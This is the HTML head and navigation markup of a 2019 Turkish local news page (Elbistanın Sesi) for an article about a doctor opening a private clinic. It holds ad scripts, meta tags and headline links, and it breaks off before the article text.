
<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7914883170465839", enable_page_level_ads: true }); </script> <title>Uzman Dr. Erdinç Hatipsoylu, özel muayenehane açtı</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content="Kardiyoloji Uzmanı ve Fiziksel Tıp ve Rehabilitasyon Uzmanı Doktor Erdinç Hatipsoylu&#039;nun hasta kabul edeceği Clinics özel muayenehane ve geleneksel tamamlayıcı"> <meta name="keywords" content=""> <meta name="news_keywords" content=""> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Uzman Dr. Erdinç Hatipsoylu, özel muayenehane açtı"> <meta property="og:description" content="Kardiyoloji Uzmanı ve Fiziksel Tıp ve Rehabilitasyon Uzmanı Doktor Erdinç Hatipsoylu&#039;nun hasta kabul edeceği Clinics özel muayenehane ve geleneksel tamamlayıcı"> <meta property="og:url" content="http://www.elbistaninsesi.com/guncel/uzman-dr-erdinc-hatipsoylu-ozel-muayenehane-acti-h64176.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2019/09/uzman_dr_erdinc_hatipsoylu_ozel_muayenehane_acti_h64176_d9189.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Uzman Dr. Erdinç Hatipsoylu, özel muayenehane açtı"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/uzman-dr-erdinc-hatipsoylu-ozel-muayenehane-acti-h64176.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="elbistaninsesi"> <meta name="twitter:title" content="Uzman Dr. Erdinç Hatipsoylu, özel muayenehane açtı"> <meta name="twitter:description" content=" Kardiyoloji Uzmanı ve Fiziksel Tıp ve Rehabilitasyon Uzmanı Doktor Erdinç Hatipsoylu’nun hasta kabul edeceği Clinics özel muayenehane ve geleneksel tamamlayıcı tıp ünitesi düzenlenen törenle hizmete açıldı."> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2019/09/uzman_dr_erdinc_hatipsoylu_ozel_muayenehane_acti_h64176_d9189.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href='http://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="http://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2019/09/uzman_dr_erdinc_hatipsoylu_ozel_muayenehane_acti_h64176_d9189.jpg" /> <meta itemprop="headline" content="Uzman Dr. Erdinç Hatipsoylu, özel muayenehane açtı" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/uzman_dr_erdinc_hatipsoylu_ozel_muayenehane_acti_h64176_d9189.jpg" /> <meta itemprop="articleSection" content="Güncel" name="section" /> <meta itemprop="dateCreated" content="2019-09-14T18:03:04+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2019/09/uzman_dr_erdinc_hatipsoylu_ozel_muayenehane_acti_h64176_d9189.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '10'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = 'elbistaninsesi'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7533583759274488", enable_page_level_ads: true }); </script> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate"></span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate"></span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate"></span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate"></span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/araba-fiyatina-ulasan-kurbanliklar-alici-bekliyor-h63829.html" title="Araba fiyatına ulaşan kurbanlıklar alıcı bekliyor" >Araba fiyatına ulaşan kurbanlıklar alıcı bekliyor</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/komur-sahasinda-gocuk-1-isci-hayatini-kaybetti-h60703.html" title="Kömür sahasında göçük: 1 işçi hayatını kaybetti" >Kömür sahasında göçük: 1 işçi hayatını kaybetti</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/unal-stk-temsilcileri-ile-sahurda-bulustu-h57204.html" title="Ünal STK temsilcileri ile sahurda buluştu" >Ünal STK temsilcileri ile sahurda buluştu</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/arslan-kudus-sahipsiz-degildir-h57124.html" title="Arslan: “Kudüs sahipsiz değildir”" >Arslan: “Kudüs sahipsiz değildir”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/politika/oztunc-24-haziranda-elbistanda-sandiklari-patlatacagiz-h56762.html" title="Öztunç: “24 Haziran’da Elbistan’da sandıkları patlatacağız”" >Öztunç: “24 Haziran’da Elbistan’da sandıkları patlatacağız”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/vefatlar/aziz-temur-anma-h55750.html" title="Aziz Temur Anma" >Aziz Temur Anma</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/ekonomi/kahramanmaras-kivisi-tezgahlardaki-yerini-aldi-h49076.html" title="Kahramanmaraş kivisi tezgahlardaki yerini aldı" >Kahramanmaraş kivisi tezgahlardaki yerini aldı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/politika/ak-partili-debgici-yeniden-aday-h49075.html" title="AK Parti’li Debgici yeniden aday" >AK Parti’li Debgici yeniden aday</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/haberde-insan/kadinlarin-kislik-yufka-ekmek-telasi-h49074.html" title="Kadınların kışlık yufka ekmek telaşı" >Kadınların kışlık yufka ekmek telaşı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/asayis/keci-otlatirken-kayaliklardan-dustu-h48619.html" title="Keçi otlatırken kayalıklardan düştü" >Keçi otlatırken kayalıklardan düştü</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="44f4e184c8ee787429e1d2c7dfcc320d930628e6" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Uzman Dr. Erdinç Hatipsoylu, özel muayenehane açtı" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" class="current" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> <a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71" >HABERDE İNSAN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/guley-yalcin-96-yasinda-h64170.html" title="Güley Yalçın 96 yaşında,"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/guley_yalcin_96_yasinda_h64170_e79e6.jpg" alt="Güley Yalçın 96 yaşında," /> Güley Yalçın 96 yaşında,</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/huseyin-durmus-79-yasinda-h64167.html" title="Hüseyin Durmuş 79 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/huseyin_durmus_79_yasinda_h64167_7996d.jpg" alt="Hüseyin Durmuş 79 yaşında" /> Hüseyin Durmuş 79 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/arife-ulger-97-yasinda-h64166.html" title="Arife Ülger 97 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/arife_ulger_97_yasinda_h64166_2f4cb.jpg" alt="Arife Ülger 97 yaşında" /> Arife Ülger 97 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/fahrettin-sonmez-77-yasinda-h64148.html" title="Fahrettin Sönmez 77 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/fahrettin_sonmez_77_yasinda_h64148_8da9e.jpg" alt="Fahrettin Sönmez 77 yaşında" /> Fahrettin Sönmez 77 yaşında</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/unal-kurt-kardeslerimize-kene-gibi-yapismis-bir-pkk-sorunu-var-h64179.html" title="Ünal: “Kürt kardeşlerimize kene gibi yapışmış bir PKK sorunu var”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/unal_kurt_kardeslerimize_kene_gibi_yapismis_bir_pkk_sorunu_var_h64179_35030.jpg" alt="Ünal: “Kürt kardeşlerimize kene gibi yapışmış bir PKK sorunu var”" /> Ünal: “Kürt kardeşlerimize kene gibi yapışmış bir PKK sorunu var”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/voleybol-takim-kaptani-evin-elbistan-icin-mucadele-edecegiz-h64178.html" title="Voleybol takım kaptanı Evin: “Elbistan için mücadele edeceğiz”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/voleybol_takim_kaptani_evin_elbistan_icin_mucadele_edecegiz_h64178_5cefe.jpg" alt="Voleybol takım kaptanı Evin: “Elbistan için mücadele edeceğiz”" /> Voleybol takım kaptanı Evin: “Elbistan için mücadele edeceğiz”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/polisten-standart-disi-isik-donanimi-denetimi-h64177.html" title="Polisten standart dışı ışık donanımı denetimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/polisten_standart_disi_isik_donanimi_denetimi_h64177_3692a.jpg" alt="Polisten standart dışı ışık donanımı denetimi" /> Polisten standart dışı ışık donanımı denetimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/uzman-dr-erdinc-hatipsoylu-ozel-muayenehane-acti-h64176.html" title="Uzman Dr. Erdinç Hatipsoylu, özel muayenehane açtı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/uzman_dr_erdinc_hatipsoylu_ozel_muayenehane_acti_h64176_d9189.jpg" alt="Uzman Dr. Erdinç Hatipsoylu, özel muayenehane açtı" /> Uzman Dr. Erdinç Hatipsoylu, özel muayenehane açtı</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" /> MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-eker-mazbatasini-aldi-h62471.html" title="Başkan Eker, mazbatasını aldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/baskan_eker_mazbatasini_aldi_h62471_6d495.JPG" alt="Başkan Eker, mazbatasını aldı" /> Başkan Eker, mazbatasını aldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/oztunctan-gungore-hayirli-olsun-ziyareti-h62469.html" title="Öztunç’tan Güngör’e hayırlı olsun ziyareti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/oztunctan_gungore_hayirli_olsun_ziyareti_h62469_f4649.jpg" alt="Öztunç’tan Güngör’e hayırlı olsun ziyareti" /> Öztunç’tan Güngör’e hayırlı olsun ziyareti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/iste-partilerin-oy-dagilimi-h62445.html" title="İşte partilerin oy dağılımı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/iste_partilerin_oy_dagilimi_h62445_7a2a4.JPG" alt="İşte partilerin oy dağılımı" /> İşte partilerin oy dağılımı</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" /> Crown Dental hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" /> Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" /> Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" /> EDH, obezite cerrahisinde söz sahibi olmaya başladı</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" /> Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" /> Otizmli çocuklar için özel etkinlik</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" /> Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" /> Nurhak Kaymakamlığı’ndan eğitime özel destek</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/spor-toto-bolgesel-amator-lig-fikstur-cekimi-yapildi-h64042.html" title="Spor Toto Bölgesel Amatör Lig fikstür çekimi yapıldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/spor_toto_bolgesel_amator_lig_fikstur_cekimi_yapildi_h64042_c4586.jpg" alt="Spor Toto Bölgesel Amatör Lig fikstür çekimi yapıldı" /> Spor Toto Bölgesel Amatör Lig fikstür çekimi yapıldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/muay-thai-bolge-sampiyonasinda-kiran-kirana-mucadele-h63449.html" title="Muay Thai Bölge Şampiyonası’nda kıran kırana mücadele"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/muay_thai_bolge_sampiyonasinda_kiran_kirana_mucadele_h63449_ce9de.JPG" alt="Muay Thai Bölge Şampiyonası’nda kıran kırana mücadele" /> Muay Thai Bölge Şampiyonası’nda kıran kırana mücadele</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistan-muay-thai-bolge-sampiyonasina-ev-sahipligi-yapacak-h63425.html" title="Elbistan, Muay Thai Bölge Şampiyonasına ev sahipliği yapacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistan_muay_thai_bolge_sampiyonasina_ev_sahipligi_yapacak_h63425_01a3d.jpg" alt="Elbistan, Muay Thai Bölge Şampiyonasına ev sahipliği yapacak" /> Elbistan, Muay Thai Bölge Şampiyonasına ev sahipliği yapacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/nergele-ve-gozpinar-futbol-takimlari-sinirda-dostluk-maci-yapacak-h62968.html" title="Nergele ve Gözpınar futbol takımları sınırda dostluk maçı yapacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/05/nergele_ve_gozpinar_futbol_takimlari_sinirda_dostluk_maci_yapacak_h62968_ee117.jpg" alt="Nergele ve Gözpınar futbol takımları sınırda dostluk maçı yapacak" /> Nergele ve Gözpınar futbol takımları sınırda dostluk maçı yapacak</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" /> ETSO ve TEB kredi protokolü imzaladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" /> DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/tedavi-sureclerinde-meslek-sahibi-olacaklar-h60414.html" title="Tedavi süreçlerinde meslek sahibi olacaklar"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2018/10/tedavi_sureclerinde_meslek_sahibi_olacaklar_h60414_dbbab.JPG" alt="Tedavi süreçlerinde meslek sahibi olacaklar" /> Tedavi süreçlerinde meslek sahibi olacaklar</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/vergi-dairesi-yapilandirma-icin-hafta-sonu-acik-olacak-h58716.html" title="Vergi dairesi, yapılandırma için hafta sonu açık olacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2018/07/vergi_dairesi_yapilandirma_icin_hafta_sonu_acik_olacak_h58716_87ab1.jpg" alt="Vergi dairesi, yapılandırma için hafta sonu açık olacak" /> Vergi dairesi, yapılandırma için hafta sonu açık olacak</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div><div class="katelement kat_k13"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" /> 16 Nisan 2017 Anayasa Değişikliği Referandumu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" /> 1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" /> 7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"></div></div><div class="katelement kat_k17"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" /> KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" /> Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img 